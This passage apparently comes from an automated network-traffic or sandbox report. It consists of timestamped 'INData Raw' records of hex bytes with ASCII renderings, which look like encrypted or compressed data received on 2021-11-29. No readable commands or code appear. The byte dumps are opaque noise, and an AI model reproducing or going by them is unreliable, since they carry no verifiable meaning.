3a 41 a4 a2 6a 76 66 28 2f e3 e9 4f 32 f6 d5 86 2f 25 57 c3 ef f0 6f 29 09 5a a8 3f c0 64 ab ef c8 c4 3a
                                              Data Ascii: ?{Zg`Rdii(xf]jv7E-Mj{0?OIR6$F&f/!`muUPZxbwQ5EZK,(iaDrL!;"Wt?\_6vyjf+~bX4D,wO`B<f3s:Ajvf(/O2/%Wo)Z?d:
                                              2021-11-29 13:25:46 UTC104INData Raw: 05 95 c8 82 1f 54 95 d8 2b c1 54 90 0e 78 ec ad 1c 2c a1 a7 21 8b e8 a5 74 45 ad db 27 10 dd d0 ef 70 39 35 0a 60 ed 90 fa 5a 6e 37 bf c8 2b b3 53 ad 44 f1 48 33 6b 7b 81 ef c6 b2 69 64 c7 d8 b7 ce 5f 23 ae dc 49 fb b5 05 ad 4c 21 21 7d 75 31 ff b8 4e 51 5c d6 ed 6d d3 47 be 6d 72 85 09 f0 83 0b 5c 50 9f bf 07 1c 92 b6 b8 dd a1 d6 ca 38 a4 ff 2f 29 5d 40 cc 98 44 52 9b a2 bb 47 5a 35 fc d6 61 1d 12 1d 39 a2 c4 92 82 c5 7f f7 ed ff d9 dd bc 49 e1 eb 67 ac 33 5f 9d 0c a2 53 1d 3c b7 a4 71 12 58 5e db c4 b7 46 12 c7 3c 5c 03 70 54 65 3a 45 04 a6 6c 2d 15 b5 cc 2e ae 33 d3 d4 c6 f2 ca 6a 1f a9 db df dd a4 e9 e6 72 eb b7 c7 91 ed 77 c2 70 7d 14 07 cf 25 7c b6 99 c0 2c d9 d3 6e 9e 9d 74 e0 bb 07 0b 20 a5 b0 ae 64 11 31 55 a8 f5 7a 5d 3b 91 4b 04 85 18 50 55 bb
                                              Data Ascii: T+Tx,!tE'p95`Zn7+SDH3k{id_#IL!!}u1NQ\mGmr\P8/)]@DRGZ5a9Ig3_S<qX^F<\pTe:El-.3jrwp}%|,nt d1Uz];KPU
                                              2021-11-29 13:25:46 UTC106INData Raw: 1e 41 ef 06 61 7d 83 94 6f 43 86 69 26 45 36 78 4f d8 54 fb 2c 73 94 9d 31 f4 0e e9 f4 b6 fa 04 37 c8 0e 9d a6 86 f2 21 03 75 46 b4 ee 11 ec 64 1a e8 f9 aa c0 80 24 b6 13 2e 8b 08 75 c2 d2 25 86 81 5d e9 f8 10 3b 47 c7 18 66 00 f3 f2 1c 63 98 e1 6e aa 32 17 7b c8 ba 6e bd a6 24 e4 f3 e2 c1 02 a3 20 7a c2 b3 45 23 61 f0 cf e7 81 f8 fc b6 12 e1 32 95 45 67 0e f3 fe 65 cc 5f 9c 7e 3c 58 66 28 21 c7 5e 5b 21 f8 a8 b4 2a 3a 41 22 f7 cf 6b 2b 63 58 b6 31 3a 49 62 e1 de ac 22 56 04 e6 63 ab 07 ce cc ae f6 20 36 b9 6a 62 27 e8 fc 97 59 aa b7 4e a6 b5 9d 41 c6 b6 ef 32 d3 2b 10 e9 0b af 40 3e 6f c4 f1 1f 6e d0 3d 77 04 81 e0 72 4d 07 a1 9a 8a 4f d8 c9 83 28 2b 2b 52 0a 0c a7 38 43 1e 12 7c 42 2a f8 e3 13 ff 08 3b e4 ee 43 90 70 44 f2 ea 61 8d 24 28 ca 5f 54 00 82
                                              Data Ascii: Aa}oCi&E6xOT,s17!uFd$.u%];Gfcn2{n$ zE#a2Ege_~<Xf(!^[!*:A"k+cX1:Ib"Vc 6jb'YNA2+@>on=wrMO(++R8C|B*;CpDa$(_T
                                              2021-11-29 13:25:46 UTC107INData Raw: 26 04 47 49 84 b7 11 7b 22 a6 46 d6 9e d8 dc 51 1c 2a 3c 25 4f 42 da 81 42 cf 6b bd 9a b8 73 2a ed d4 10 11 68 13 3c ab af 63 1c c7 75 e2 43 7d d1 dd ac 57 d6 62 98 ad 15 79 91 75 5f 8d 6e 34 b9 ba 1f 0b 59 4f d7 d8 58 43 29 a4 de f7 eb 59 26 51 33 56 0d db 6d 24 0a bf 30 54 8c 3f db d6 d9 e3 ca 53 1d a9 db e6 d0 cc ef e7 63 e7 aa 9c 7f ed 5b d6 64 17 1e b1 a0 7a 75 d9 0e e4 2e a8 c2 4e 8d 91 7d e7 dc 81 f7 21 83 95 ae 7d c7 13 46 db e4 5f a3 3e d2 cf 2d 80 2a 86 c3 79 3d fe 83 61 42 cb 1b 63 dc 43 a7 24 57 8e 12 aa 66 50 13 d6 47 e8 0a af 9a f5 47 75 fb 3b de ea 37 e7 a9 c3 0d a8 f8 2a 67 c2 e6 65 bb f9 19 6d 32 59 7c 57 01 7d a3 c7 d2 d8 e3 da fa 6f 01 20 61 c5 16 8b 09 78 d8 e5 19 09 37 72 1f c7 52 1f c5 4c 8c 5d 4b 02 05 94 ce 3c cf 76 12 d9 16 62 6c
                                              Data Ascii: &GI{"FQ*<%OBBks*h<cuC}Wbyu_n4YOXC)Y&Q3Vm$0T?Sc[dzu.N}!}F_>-*y=aBcC$WfPGGu;7*gem2Y|W}o ax7rRL]K<vbl
                                              2021-11-29 13:25:46 UTC108INData Raw: 15 98 a0 5c dd ab 00 ef 71 f4 db ec 9b fc dc 1e 03 e9 27 8a af 4e ce ee fb 60 d2 cd 8f a8 14 62 73 3c 3f f8 de fe 21 f2 df b1 00 60 42 29 c6 31 67 2b 74 46 24 38 c4 48 4f e4 cf c3 16 f4 04 e2 7c d1 6f cd 36 51 0f 29 b4 ad 62 62 37 f4 f7 95 8f 08 9b 43 bd 98 93 59 86 b7 e2 3a c7 1c e8 fe 03 a9 46 bb 77 d1 0f 1f 51 d8 3d 75 05 e9 e6 76 4d 01 1c 9d 9d 53 cc cc a3 94 30 d5 59 0e b1 af 29 4e 0c a3 57 7a 2d f3 d7 ed f3 08 2c fa 7c 5d 6e 71 69 ff fb 76 ad 98 34 1c 7d 7b 29 73 08 b4 94 8b bb c1 bf 37 98 40 4a f5 a9 1c bb 2d fe 41 92 c7 53 d1 47 08 16 42 b0 7d e8 e3 16 40 b2 be 5f 7b c0 45 da ce 2b 25 03 c7 9d f9 b8 97 bb 6b 6c 9a cf 05 dc 65 c2 22 9f e4 a2 ef 72 c7 b5 8d 1c d7 89 25 e6 0e c9 2a d1 31 bb b4 2e 85 76 1e f6 2d 09 44 93 b7 53 60 68 e7 db 97 cc 8e 72
                                              Data Ascii: \q'N`bs<?!`B)1g+tF$8HO|o6Q)bb7CY:FwQ=uvMS0Y)NWz-,|]nqiv4}{)s7@J-ASGB}@_{E+%kle"r%*1.v-DS`hr
                                              2021-11-29 13:25:46 UTC109INData Raw: f1 a5 c5 70 1f d3 c0 d8 d8 68 e7 63 e9 80 c0 6f ec 51 d9 ac 2c 0b 17 a0 e6 75 d9 0e f8 55 2c 33 b0 53 83 65 e0 c6 2a f5 21 88 9f b5 66 08 44 7f a0 ea 5f cc 6d bd 49 25 5c 08 65 ad 44 53 2a 7b b4 9c c7 33 15 b8 43 ad 0e 6f 8e 12 8d b8 50 05 f7 41 c2 4b 8b 9a f5 47 79 fb 3b cc ea 37 e7 1f c0 0d a8 30 6f 67 c2 ea 4f ba f9 03 03 33 58 6f 71 03 7d 8b c7 d2 d8 eb d8 fa 7e 17 a0 4b de 16 94 1e 86 d9 6a 1a 11 3c 7e 18 d1 ac 1e e9 4e 9b 54 4b 05 1d d3 ce 10 cd c7 10 f2 f5 33 15 ff bd f4 d2 a9 49 80 df 6f a1 e7 22 cb d7 3c 8d 94 79 0f a3 ea 40 21 f6 71 9c 6e ee 8d 2f 13 3a b9 1d 51 cd 10 55 90 7d 00 38 85 71 18 84 2b 9e cc 5d ee 75 ad 64 e0 c3 5c df a2 67 55 b3 2e ae 91 3e 3b b8 18 08 52 b6 78 f5 9c dd 6b f3 fa 9c bd 93 db ac a7 3e cf 07 1d ff 98 64 dd 65 b8 55 a1
                                              Data Ascii: phcoQ,uU,3Se*!fD_mI%\eDS*{3CoPAKGy;70ogO3Xoq}~Kj<~NTK3Io"<y@!qn/:QU}8q+]ud\gU.>;Rxk>deU
                                              2021-11-29 13:25:46 UTC111INData Raw: af 5b e8 70 d7 25 1e 42 dd 30 71 13 c3 16 6a 4d 38 e9 8c 95 47 d8 d8 8b 37 30 d5 53 41 67 af 3c 5e 20 a1 7d 59 1a e4 ff ac f7 08 2a 02 f1 5a 7f 59 6f ee ef 64 f6 80 36 1c 7d 63 09 ed b0 b6 92 97 3b b8 2c 37 99 5e 55 e8 ee dc bb 2d fe 7a 24 ec 0b ca 69 d6 72 42 ba 4d f2 5e e9 bf b4 b9 73 8e ba d6 dc d8 ac 4d 1a c6 9c e7 80 af 82 cc 44 92 c0 2d 80 0a 02 2a 95 30 9a 7b 5a f0 bf a1 04 cb 9b 07 c7 33 c9 2c b4 2f b9 b2 0e ea 63 1e b7 3b 02 55 97 d8 92 62 68 ed dc bf da 8c 72 fa 91 af 86 5c 38 72 83 80 66 66 25 4f cc c7 97 86 20 9a bb 07 27 33 44 93 f0 32 b4 33 82 79 79 ec a3 df 39 b8 71 34 bf c8 8d 6e bb a6 e4 38 3b 87 d7 94 78 32 1d 36 0f 6b 98 24 50 61 c7 06 ba 56 af 50 ad 58 ee 3e a5 63 77 90 e7 da 4c 68 48 d7 db 72 20 46 37 b4 d8 5f ba d3 c8 5a b3 86 32 75
                                              Data Ascii: [p%B0qjM8G70SAg<^ }Y*ZYod6}c;,7^U-z$irBM^sMD-*0{Z3,/c;Ubhr\8rff%O '3D23yy9q4n8;x26k$PaVPX>cwLhHr F7_Z2u
                                              2021-11-29 13:25:46 UTC112INData Raw: 75 a8 30 21 6c c0 ec 0a 71 fb 03 67 28 42 79 08 f7 7c 8b c1 fa cf ea da f0 56 40 29 4a d8 3e a2 1c 86 df a6 63 11 3c 78 15 d3 aa 71 23 4c 9b 5c 54 09 07 7d a0 e4 cc 5d 16 e4 dd 72 16 ff b7 ee d5 81 58 85 df 69 ce e5 13 c2 dd f0 38 95 79 e3 8b f8 54 3f 7d 57 95 46 fc 9b 26 66 fe a0 1c 5b d4 3a 48 9f 41 3c b9 87 77 36 b7 a6 99 c6 50 ed 60 cc bf ec d5 47 c9 38 6c 4d cf d5 be 9e 2c 07 b8 94 27 58 9e 2e e4 8c ca 53 cb ef 00 aa ec b4 84 00 34 e7 38 39 ee 82 61 4a 5e b4 4c 96 9e 61 be 36 ea c1 2c c5 75 a0 37 66 7d 20 4f ab 09 41 12 9c fb d4 69 a7 d8 a9 54 42 87 70 52 48 26 7f 49 bc 6d e9 24 77 ea 5e 24 0a 05 1f ef 76 fe d6 24 c8 15 88 9a 40 e2 04 0b 7a 47 ba 9e d7 38 4c 2b e1 e8 a8 30 30 f0 a7 13 4b 72 df 6d d1 a2 c9 94 89 5b d0 e7 0e 2f b3 ee 63 74 03 fd c5 38
                                              Data Ascii: u0!lqg(By|V@)J>c<xq#L\T}]rXi8yT?}WF&f[:HA<w6P`G8lM,'X.S489aJ^La6,u7f} OAiTBpRH&Im$w^$v$@zG8L+00Krm[/ct8
                                              2021-11-29 13:25:46 UTC113INData Raw: f9 bb dd f4 ab 21 8d 70 95 f5 7a 59 80 cc 73 a4 d6 26 86 74 c9 37 bc c4 b3 e6 51 83 b5 8f 16 dc 8c 28 d1 1c da 21 db fe b0 ab fa 84 5a 12 a1 32 87 f3 84 6d 40 69 65 fd c8 9c 3f 9e 79 e3 c7 c2 87 70 3e 0c f1 9a 26 ab 2c 5e ca b7 d8 95 2b 90 87 93 e7 c1 54 b9 cc 32 ca cf ec 2e 7f fa e9 b5 3d b2 af 3e 93 f3 b1 6e aa a7 e8 0c ed 8c fe 9f 7d 31 22 d8 9e 78 96 e5 62 74 e6 07 b7 5d b0 77 53 41 c2 71 27 0c 87 91 e7 dc 4b 07 b4 d6 db e1 da 97 20 ae d2 48 61 a7 2a 50 b3 36 3a 1a 8a 21 f7 a4 af 76 63 d2 ef 07 d6 59 87 97 1c 2f 1b e1 81 05 4e 54 41 2e 79 ef 8c a4 40 c3 b7 cf d0 3e a2 23 23 26 bc 52 f3 9c 43 5c a3 d2 63 b8 5b 1f f3 de 09 18 13 0c 36 b4 88 f2 81 e9 7e eb c6 fb 07 4c be 45 e1 da 8a a6 1f 44 9e 7c 77 ad 1c 1a a1 8a 78 1b 58 4f cc f9 5a 4c 3e df 0f 5f e9
                                              Data Ascii: !pzYs&t7Q(!Z2m@ie?yp>&,^+T2.=>n}1"xbt]wSAq'K Ha*P6:!vcY/NTA.y@>##&RC\c[6~LED|wxXOZL>_
                                              2021-11-29 13:25:46 UTC114INData Raw: 2c d1 f2 15 be 55 1e 61 d0 0f 14 5d cb 3f 7a 13 d0 1d 6d 0d f9 bf a0 88 44 d1 c0 5d 3f 26 c4 57 0e 11 ae 29 4e 3f e0 6f 49 2a f6 f4 1f c1 f6 2b c0 fd 4b 64 6d 28 43 13 9d 7a 24 03 0f 7c 6f 10 89 13 8e 6c 9c 1a d7 b8 58 65 55 5e e7 90 b7 d4 fd f6 69 28 d8 68 c8 64 b9 07 49 a5 68 78 1d c5 b2 b6 24 c0 80 dc 93 06 cb a2 3d 33 d4 97 ed bd 88 8c ff 92 9b e9 26 f5 65 c0 28 93 29 ba d5 62 e3 be 8d 07 d1 80 34 30 37 e5 21 a8 ef b9 b2 02 96 70 01 ab 22 02 44 82 bc 4c 78 96 e6 f7 99 36 98 a4 ff e6 2b 50 cd e4 10 e4 99 75 67 2e 4f c1 b7 e0 78 21 bc 85 9b f0 28 83 04 cb ef b2 e3 60 05 79 ec a8 0f 21 a0 bc 2a 9a f1 b1 71 a5 52 f6 11 02 8a bd 68 7f 38 33 1f 09 04 42 f8 50 6d f2 18 b5 5d af 43 a6 5f c4 ad 21 4f 77 81 e0 c0 23 91 49 d7 dd f8 9e 55 29 ae c9 54 a4 e3 06 53
                                              Data Ascii: ,Ua]?zmD]?&W)N?oI*+Kdm(Cz$|olXeU^i(hdIhx$=3&e()b407!p"DLx6+Pug.Ox!(`y!*qRh83BPm]C_!Ow#IU)TS
                                              2021-11-29 13:25:46 UTC115INData Raw: 33 e5 11 c6 70 e2 31 2b 63 c0 e8 1e f3 f8 03 69 5d 61 6e 67 09 11 a8 c7 d2 d8 eb da fa 5e 57 70 62 4f 16 8c 14 31 a4 8a 1a 11 38 70 1a aa ef 1f e9 4a 8c 8c 5c d3 90 41 cf 10 cc 20 55 f3 f5 64 3d ff bd e2 c1 99 4c 80 a0 6e a1 fc e5 c2 d7 d8 99 87 7c db ca eb 51 3f 7b 4b 99 76 11 9f 0a 6e 92 ae c7 4c 08 9b 6f 96 69 29 b0 9e 62 1b 93 b7 9c d3 54 11 67 8f 73 e6 ff 52 dc 13 73 5b b1 24 a5 60 2b 03 be 97 5c 15 b7 79 e2 8e b7 3d e4 ed 04 76 89 d7 97 05 3e de 08 25 10 89 5e 5f 4b a5 3f e8 ce 60 ba 35 2d bb 68 bf 42 a5 28 6b 01 ee 4d ba 06 82 f4 45 c0 0b 68 7c 4f af 51 42 97 66 44 54 c9 79 72 50 5a e8 24 71 fe d0 27 0a 0b c7 8c e8 e8 0c 33 d1 10 84 99 4d f2 0d 10 72 47 c0 b6 1c 3a 48 37 c1 f3 a0 e8 03 5b f0 18 53 ae 00 73 10 c0 05 5b 89 5d f8 f3 06 f5 aa c2 36 74
                                              Data Ascii: 3p1+ci]ang^WpbO18pJ\A Ud=Ln|Q?{KvnLoi)bTgsRs[$`+\y=v>%^_K?`5-hB(kMEh|OQBfDTyrPZ$q'3MrG:H7[Ss[]6t
                                              2021-11-29 13:25:46 UTC116INData Raw: b5 ab 7f 9e 49 42 dc d8 a7 31 04 d6 9b fb bd 86 1f f7 6c 9a c4 8f 97 62 d6 00 39 3a b2 c0 72 1d b4 8d 1c f2 42 2d ce 3c 55 35 d6 fc b6 b2 15 88 6b e0 b6 1d 07 5c 91 cc 19 61 68 e3 c8 9e 2c 8b 6c ef e2 3c 97 51 2d 13 05 81 4a 66 3f 5b db a2 c0 22 3f 9f 85 95 f9 2e 58 8a c4 cb a4 19 e0 3f 7d fd a0 3d a7 4c 50 de 85 f9 a9 63 bb bd fa 22 1c 73 d3 b8 74 3b 0c 98 0f 6b 92 e5 40 74 e0 07 b7 5b b0 58 53 41 c2 42 36 61 00 d3 e6 da 48 7f 92 c4 d1 f4 b0 59 29 bd d5 5f aa c5 e1 ac b2 10 2c 77 0e 69 f6 a2 b4 46 79 ad 6e 16 dd 47 a8 6b 66 4a 0a f0 8d 88 f0 6b a2 be 16 1e 97 b7 4b dc 9c d1 c4 2a 4d 29 10 21 53 55 c8 0a 6c 52 93 bd 90 b5 44 0c ff d9 1a 02 1e 05 c3 aa 87 1b 82 be 3c e9 cf e8 5f 6a b7 97 e9 24 8e 7b 92 7e 95 63 54 5e 04 25 a5 b2 73 17 47 5e 2d db 65 4d 2f
                                              Data Ascii: IB1lb9:rB-<U5k\ah,l<Q-Jf?["?.X?}=LPc"st;k@t[XSAB6aHY)_,wiFynGkfJkK*M)!SUlRD<_j${~cT^%sG^-eM/
                                              2021-11-29 13:25:46 UTC118INData Raw: b8 9d 17 df 16 40 bc 77 3b 8c 82 71 b9 93 a6 99 37 5d ef 77 b5 66 eb fe 0e d6 11 73 42 5e 20 93 9b 3e 05 b5 86 22 52 a7 7c fe 72 cd 57 eb ef 6f 65 83 cc 8e 18 63 d9 23 1e f7 9b 77 4d 58 a2 53 50 ce 4c bd 2e e8 c3 2e af 47 b7 c9 63 3e e8 5a b8 06 9b 1b 41 f6 f0 7f 5d 57 97 56 69 3d 61 34 97 37 78 41 ab 79 e8 24 73 85 95 26 0a 4f 9e d4 ae e9 0c 37 d9 06 72 8e 21 db 9c 1a 70 4f 0b e6 cb b7 67 21 e9 f8 ab fe 2f a8 01 0e 89 b9 0d 78 ed ef 3f 9c 91 85 e0 9f e0 2f b9 cc 38 71 0a f3 cd 15 b7 b0 6a 44 48 3a 04 74 ff 4c 7f b5 ac a9 e5 fb 3f 32 0a 9e 28 42 04 ac 2b 4d 73 c0 cc f8 32 eb f4 b6 ff e9 2d 9c ad 75 27 d2 50 66 c4 40 88 b9 11 7d 99 29 07 e7 ff 4e f7 ff ca 9e 38 3f 45 2c eb c7 9d 2a 5e 55 82 7d d8 5b 4b f0 ca d2 22 a9 05 ce 7e d4 43 2a a3 5d 14 2c 3c aa 73
                                              Data Ascii: @w;q7]wfsB^ >"R|rWoec#wMXSPL..Gc>ZA]WVi=a47xAy$s&O7r!pOg!/x?/8qjDH:tL?2(B+Ms2-u'Pf@})N8?E,*^U}[K"~C*],<s
                                              2021-11-29 13:25:46 UTC119INData Raw: ed a9 09 2f bb b9 09 be e5 ba 68 d4 26 f6 3d 15 e2 4a 94 7e 32 3e 1f 0b 63 fd 0d 51 67 eb 0a b7 51 bb 7a 42 44 ee 55 37 ee 7c 90 e7 db 5f 76 59 c9 cd cf 90 43 22 a8 7a 4e a5 dc ec 46 9b 9f 32 75 7f 31 f0 b6 98 bf 74 d9 e9 01 50 41 be 69 1c 10 14 e1 96 10 6f 65 92 bf 10 b6 9c bb 52 c8 99 f4 78 3e b3 22 14 12 40 53 d5 b8 f5 43 93 b7 a3 74 5a 19 ec dd 0e 3b d0 1e 3d ad bc 81 87 c5 75 e9 dc cc c0 fd bb 57 72 c1 99 ad 1e f7 84 43 41 47 09 1e 0b b2 62 10 4c 67 10 d9 49 41 29 43 03 40 fc 8e b8 5b 22 77 1a b0 f1 1a 0a bb 33 8d 93 1f cf c6 c4 dd 06 c3 1f a3 c5 e8 11 b4 e1 e0 74 6e af e7 6f ed 48 f0 63 24 0c 11 43 1e 75 d9 05 60 3d f1 d8 5b 99 bd d7 f1 b3 1b e1 09 4a b0 b9 71 0e bc 43 a0 ea 5f b0 19 ac 6a 39 96 ac af a9 44 54 a2 6d bd 88 d3 27 7c 7f 43 ad 06 7b a6
                                              Data Ascii: /h&=J~2>cQgQzBDU7|_vYC"zNF2u1tPAioeRx>"@SCtZ;=uWrCAGbLgIA)C@["w3tnoHc$Cu`=[JqC_j9DTm'|C{
                                              2021-11-29 13:25:46 UTC120INData Raw: 37 63 cb 8b 5b e8 20 0d c9 94 26 0e 05 18 01 ac e9 0c 12 f1 31 82 b1 72 e0 1f 0e 7a 6d 84 f1 1d 30 91 c3 eb f9 a0 ea 00 01 b3 19 55 82 2d 75 c6 c7 15 a4 89 5d f2 c9 c6 2d b9 c6 22 fb 28 fb ed 17 a6 ab 68 44 8d 3d 04 78 ff 8b 7d b5 ac 46 1f ed e9 39 10 9b 3d 67 b2 5a 00 4d 66 9f 29 fa 8d e1 e7 93 3b e7 2c 8d bb 74 07 c2 1c 64 c4 4a 04 82 14 63 7c 3b 37 fe ea 4d 09 da d1 97 2d 2c c8 3a ee dc 62 3f 66 44 81 9c c4 48 44 d8 f3 d2 3e 51 12 ca 9e c7 47 29 23 4d 1d 17 11 ae 62 64 20 6d e4 81 a7 aa 8f 57 a3 98 21 59 86 b7 c6 1b d6 34 01 ec 2b 47 53 36 7a f9 e6 1c 42 d6 3d 6d 07 e9 3e 76 4d 01 a8 01 9e 47 d8 d9 9f 23 24 fd f0 26 00 a5 01 6e 25 a1 7a 54 02 0f fd 00 fd 20 c3 ee f1 50 46 c0 68 eb e5 4e 98 2a 28 08 5f e8 02 82 0a a2 1f 9a 36 c6 be 23 8d 40 76 42 81 bf
                                              Data Ascii: 7c[ &1rzm0U-u]-"(hD=x}F9=gZMf);,tdJc|;7M-,:b?fDHD>QG)#Mbd mW!Y4+GS6zB=m>vMG#$&n%zT PFhN*(_6#@vB
                                              2021-11-29 13:25:46 UTC122INData Raw: d2 2f b9 3f ea 40 ae 51 df 9a 2b c4 92 bd 90 a1 34 91 ed d4 10 7c 9a 1c 3d a1 b8 08 9f d0 66 ff cf fd c6 c2 b7 bf ff d2 b7 bc 0d 3a 69 62 55 55 0b 59 7a b0 62 10 37 b3 d2 da 4f 50 51 1c 06 40 f6 e0 57 7b 33 50 1b c9 af 27 0a b1 5d d1 83 3e dd c1 c3 ea be d0 08 a9 c0 d7 cd ba 1f e7 4f f4 b9 e2 47 c7 5e d2 74 2e 3e 06 cf 2b 5d 4c 04 c2 26 c0 c4 50 83 86 63 f1 a2 06 ea 06 77 b2 95 7d 08 3b 5d 76 f9 54 bc 12 ae 5e 2f 91 37 89 57 45 79 09 02 0d 9c c7 39 58 c6 50 ba 0c 7e 99 0d 86 46 51 29 f0 47 d3 5b dc 82 f4 47 7f e4 1c df fd 37 f6 08 dd 25 56 31 07 6a d3 e0 74 ad c7 51 6c 32 58 70 4e 10 6a 8b d6 c5 c4 15 db d6 78 15 38 5f c3 05 9b 1e 97 ce d6 00 ef 3d 5e 3b c0 be 71 15 4f 9b 50 5d 6a cf 68 cf 1a a2 a1 11 f2 f3 78 78 2d bf e2 d8 c6 b7 81 df 69 b2 ed 0d de c4
                                              Data Ascii: /?@Q+4|=f:ibUUYzb7OPQ@W{3P']>OG^t.>+]L&Pcw};]vT^/7WEy9XP~FQ)G[G7%V1jtQl2XpNjx8_=^;qOP]jhxx-i
                                              2021-11-29 13:25:46 UTC123INData Raw: 0a b7 03 ef 3e 82 aa 6b 4d 16 fa 66 c2 56 e7 7a 16 63 6d 47 d7 ee f6 5f 39 9d 07 95 2b 30 2a c3 ef dc 65 38 7c 41 a7 41 88 49 4e f4 ca d8 16 4b 06 e2 70 d6 4c 50 10 53 09 39 2a ba 73 72 3e 8f cb 83 a7 ad 8a 53 a6 bc aa 74 83 bd e8 1a fd 36 07 fc 2b 44 53 36 7a be 2b 1c 42 da 3d 61 02 ca 3e 5f 48 07 b8 a4 b7 45 d8 de a3 dc 32 d5 59 49 26 ad 29 42 31 b1 7f 2d 00 e5 ff 06 f1 19 3a 83 e9 5b 6e 7b b6 e4 ca 4a b2 3b 34 16 64 7b 29 ba 0c b4 98 43 36 d7 b5 20 4f 47 54 f0 8b ae ac 13 81 97 dd 38 42 ce 78 6f 05 57 ab 52 97 0a 67 08 8a 41 8a 76 3b 43 f6 d8 e7 16 03 c7 9c ed ac 83 c0 c8 6c 9a ce 2d 86 65 9c 28 95 3a a0 ca 5a f0 af 8d 16 db 9f 2f ce 36 54 2a db ef d6 b3 04 85 7c 1c b7 31 06 44 93 b7 49 60 68 e6 c0 a7 36 8f 28 fd ef 3c 83 5d 32 0c f9 8a 64 7a 41 bf cb
                                              Data Ascii: >kMfVzcmG_9+0*e8|AAINKpLPS9*sr>St6+DS6z+B=a>_HE2YI&)B1-:[n{J;4d{)C6 OGT8BxoWRgAv;Cl-e(:Z/6T*|1DI`h6(<]2dzA
                                              2021-11-29 13:25:46 UTC124INData Raw: fe 6e ec 5b c2 72 06 1a 1c cf 21 74 83 06 3c 39 9f cc 4f 8f 97 77 8c c8 10 f5 25 8b b7 c4 0b 18 31 40 8a ea 4d 93 3e bd a3 2f 80 20 98 a8 44 44 02 82 8b d1 c7 33 56 de 3d 98 0c 6f 8a 6f de b9 50 01 fe 91 8f 4b b3 98 dd 53 75 fb 31 e4 ea 36 e7 15 bf 70 a9 30 2f 64 d6 14 64 ad 07 02 67 34 74 42 65 00 f3 3c ba 52 d9 eb de f8 7c 6c ab 4b de 12 a4 46 84 d9 c3 66 6e 3d 72 1c d2 ba 1c 92 31 9a 56 4f 07 66 ea ce 10 c9 75 fd f0 f5 6a 13 eb 43 e3 c4 57 48 8b d8 43 8c fe 16 4c 60 b4 0d 95 79 e7 a1 e8 2a bd 7a 5a 98 46 b7 9c 26 6a ec 38 1c 5b da 12 52 94 12 a9 bd 87 75 1c e8 24 98 cc 59 c7 8b a1 75 e4 d0 59 28 01 60 a5 a1 2d b7 b2 6d 2d aa 1b 90 2f 32 78 e6 88 ce 79 9e 69 01 ac 87 e4 dc 02 3e c5 70 b8 ef 88 76 48 5f a5 3f 2d ce 60 ba 34 80 42 2f be 46 89 da 60 12 e1
                                              Data Ascii: n[r!t<9Ow%1@M>/ DD3V=ooPKSu16p0/ddg4tBe<R|lKFfn=r1VOfujCWHCL`y*zZF&j8[Ru$YuY(`-m-/2xyi>pvH_?-`4B/F`
                                              2021-11-29 13:25:46 UTC125INData Raw: 78 6b 1d a1 a4 83 6f f5 da 8b 31 1a 83 2d bf 01 af 2d 5f ba 84 51 48 0c fc e0 2c ed 20 07 ee f1 5c 44 2b 16 72 ee 62 81 27 ae 39 5a 64 27 9e 13 84 8d 91 1e eb bd 37 9f 7e 04 9f 18 be bb 29 e9 f3 07 ea 58 fd 72 a6 2a 5d b5 6f ab 1e e9 b9 9f f0 09 10 c5 45 d8 c6 3c 07 2e cc ba f3 b3 c8 8c c5 44 b7 c7 2d 80 4f a0 56 0c 3b b2 ce 45 f9 2f a8 3b d6 b9 30 c7 29 91 35 d7 c7 96 b0 04 83 5c 7c c9 a8 08 44 97 a8 59 fa 4d ca d7 b1 20 85 6d 98 f0 37 ae 71 30 1d fd aa 38 12 b7 5f ca ac ee 8d ba b5 bb 93 df 20 5e 8a b3 2c 8d 18 ef 2e 7f c6 cb 7d a7 b3 af 25 85 ec 20 4b 96 a0 d1 22 1f 92 a0 8b 62 10 18 0c 0f 6d b8 94 2e fe ec 07 a2 49 a2 c8 88 6d e1 75 3f 6e 5b 1e e7 da 4c 77 42 ff f6 e5 b5 40 08 c0 a6 c6 ba c8 fc 4d bd a6 17 58 7a 06 e8 ac 90 c8 70 d9 ef 09 d7 6e 93 6b
                                              Data Ascii: xko1--_QH, \D+rb'9Zd'7~)Xr*]oE<.D-OV;E/;0)5\|DYM m7q08_ ^,.}% K"bm.Imu?n[LwB@MXzpnk
                                              2021-11-29 13:25:46 UTC127INData Raw: 6f 63 1c 48 11 e2 ff d6 cd c5 cf 5e 93 29 4a de 08 a4 33 84 d9 cf 31 7b 42 eb 19 d1 a8 01 df d4 be 7b 45 23 02 5c ef 9c cf 5d 10 ea dd 4d 15 ff bb c8 b8 d7 d0 81 df 6b be cb 88 e7 fa c7 a9 8b 4e c3 2d e8 51 3f 62 72 b1 6c ef 98 0c 0a ef 20 1c 5b da 09 7c 0c 4c 05 b2 a1 6e 26 b3 37 9b cc 5d f4 4e 8e 77 ee d3 67 bc 7e ef 5a a0 25 a0 a7 b0 0a 82 9b 01 4d 8f 59 70 8e cc 7b f9 c5 2d ae 83 ca ae 6a 40 56 0c 3b ea 97 48 d7 6c 8a 4a 88 d0 5a 9e aa f9 c6 2e a3 6a 8c 35 62 14 c1 27 d5 9a 9a 0a 40 f3 35 e4 54 78 b2 72 5d bd 43 f8 5c 37 78 52 ef 77 ea 24 75 af fb 58 93 0e c5 f3 b1 d5 96 12 f4 09 a4 ae 44 d3 ab 18 70 45 a3 f8 35 17 4e 21 ef d3 ca 96 b1 27 b6 1d 4c 97 93 50 eb c3 1b 8a b4 7d 57 f2 0f 2f ae ee 19 74 03 fd c7 7c cb 29 6b 6c ae 27 3a e4 f2 82 73 93 b9 0b
                                              Data Ascii: ocH^)J31{B{E#\]MkN-Q?brl [|Ln&7]Nwg~Z%MYp{-j@V;HlJZ.j5b'@5Txr]C\7xRw$uXDpE5N!'LP}W/t|)kl':s
